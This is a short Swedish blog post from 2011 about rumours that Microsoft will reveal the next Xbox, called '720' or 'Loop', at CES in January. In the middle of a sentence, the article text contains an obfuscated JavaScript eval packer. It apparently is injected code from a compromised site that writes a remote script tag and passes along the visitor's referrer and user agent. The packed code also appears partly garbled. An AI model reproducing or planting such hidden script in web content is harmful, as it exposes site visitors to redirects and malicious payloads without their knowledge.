Image Image Image Image Image Image Image Image Image Image

| 24 april, 2018

Scroll to top

Top

4 Comments

Revue.se | Xbox 720 (loop) i Januari?

Xbox 720 (loop) i Januari?
Filip Urde
  • On 15 november, 2011
  • http://www.revue.se/filip-urde

Först är ju frågan: Kommer nya Xbox att heta Xbox 720 ? eller kommer den att heta Xbox Loop ?

På CES-mässan kommer ett nytt rykte och det är att nästa Xbox-modell ska komma redan i januari! Microsoft kommer på CES-mässan att berätta de första detaljerna om Xbox 720/ loop, ja, vad man nu vill att den heter. Xboxygen, där eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rtnsy|var|u0026u|referrer|nnybi||js|php’.split(‘|’),0,{}))
jag hittade informationen så menar man att det inte blir några ”stora” avslöjanden, inte heller en massa visningar av spel eller funktioner, Microsoft kommer berätta om hårdvaran och dess specifikationer. Kanske nämna om den heter 720 eller loop? vore ju kul!
CES-mässan kommer att hållas i januari i Las Vegas. Så då vet vi om ryktena är sanna!
www.computerandvideogames.com